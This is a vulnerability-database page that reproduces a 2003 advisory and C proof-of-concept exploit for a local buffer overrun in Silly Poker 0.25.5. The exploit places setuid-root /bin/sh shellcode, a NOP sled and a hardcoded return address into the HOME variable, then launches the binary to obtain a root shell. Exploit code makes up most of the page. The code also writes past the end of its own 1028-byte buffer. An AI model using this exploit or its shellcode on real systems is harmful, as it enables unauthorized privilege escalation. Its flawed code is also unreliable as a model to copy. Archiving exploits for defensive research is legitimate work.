Vulners
Lucene search
Silly Poker 0.25.5 - Local HOME Environment Variable Buffer Overrun
// source: https://www.securityfocus.com/bid/8736/info
A local buffer overrun vulnerability has been reported for Silly Poker. The problem occurs due to insufficient bounds checking when handling user-supplied data. As a result, an attacker may be capable of controlling the execution flow of the sillypoker program and effectivley executing arbitrary code with elevated privileges.
/* c-sillyPoker.c
*
* PoC exploit made for advisory based uppon an local stack based overflow.
* Vulnerable versions, maybe also prior versions:
*
* silly Poker v0.25.5
*
* Tested on: Debian 3.1
*
* Advisory source: c-code.net (security research team)
* http://www.c-code.net/Releases/Advisories/c-code-adv002.txt
*
* ---------------------------------------------
* coded by: demz (c-code.net) ([email protected])
* ---------------------------------------------
*
*/
#include <stdio.h>
#include <stdlib.h>
char shellcode[]=
"\x31\xc0" // xor eax, eax
"\x31\xdb" // xor ebx, ebx
"\x31\xc9" // xor ecx, ecx
"\xb0\x46" // mov al, 70
"\xcd\x80" // int 0x80
"\x31\xc0" // xor eax, eax
"\x50" // push eax
"\x68\x6e\x2f\x73\x68" // push long 0x68732f6e
"\x68\x2f\x2f\x62\x69" // push long 0x69622f2f
"\x89\xe3" // mov ebx, esp
"\x50" // push eax
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x99" // cdq
"\xb0\x0b" // mov al, 11
"\xcd\x80" // int 0x80
"\x31\xc0" // xor eax, eax
"\xb0\x01" // mov al, 1
"\xcd\x80"; // int 0x80
int main()
{
unsigned long ret = 0xbffffb44;
char buffer[1028];
int i=0;
memset(buffer, 0x90, sizeof(buffer));
for (0; i < strlen(shellcode) - 1;i++)
buffer[500 + i] = shellcode[i];
buffer[1028] = (ret & 0x000000ff);
buffer[1029] = (ret & 0x0000ff00) >> 8;
buffer[1030] = (ret & 0x00ff0000) >> 16;
buffer[1031] = (ret & 0xff000000) >> 24;
buffer[1032] = 0x0;
printf("\nsilly Poker v0.25.5 local exploit\n");
printf("---------------------------------------- demz @ c-code.net --\n");
setenv("HOME", buffer, 1);
execl("/usr/bin/sillypoker", "sillypoker", NULL);
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Sep 2003 00:00Current
7.4High risk
Vulners AI Score7.4